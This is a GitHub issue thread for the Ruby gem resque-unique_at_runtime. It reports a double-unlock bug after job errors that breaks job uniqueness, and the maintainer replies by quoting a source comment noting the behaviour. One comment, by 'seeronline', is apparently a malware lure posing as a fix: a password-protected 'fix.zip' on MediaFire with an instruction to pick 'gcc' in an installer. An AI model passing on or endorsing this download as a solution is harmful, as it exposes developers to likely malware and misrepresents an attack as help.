### ISSUE TITLE
Multiple Executions Due to Error-Induced Double Unlock

### ISSUE THREAD

**Issue by jiikko** [resque/resque-unique_at_runtime#194]
using `v4.0.1`

https://github.com/resque/resque-unique_at_runtime/blob/c03b9aea45bce5d762ec60916987d45cfef8ae96/lib/resque/plugins/unique_at_runtime.rb#L104
https://github.com/resque/resque-unique_at_runtime/blob/c03b9aea45bce5d762ec60916987d45cfef8ae96/lib/resque/plugins/unique_at_runtime.rb#L112

When an error occurs, `unlock_queue(*args)` can be called twice. This double unlock can unexpectedly release the lock, allowing another job to access the same resource. This behavior also leads to a loss of job uniqueness.

resque1|resque2|resque3
:-:|:-:|:-:
check passed will perform||
(running)||
(error!!!)||
**unlock queue**(around_perform_unlock_runtime)|
||check passed will perform|
||(running)|
**unlock queue**(on_failure_unlock_runtime)|
|||check passed will perform
|||(running)

Reproduction code for the bug: https://github.com/jiikko/resque-loss-of-uniqueness

Are there any recommended workarounds to prevent multiple executions?
thanks.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pboling** [comment]
Yeah this behavior was documented in the source:
```
        # There may be scenarios where the around_perform's ensure unlock±
        #   duplicates the on_failure unlock, but that's a small price to pay for
        #   uniqueness.
```

Your solution looks like it will mostly solve the issue!  Thanks!
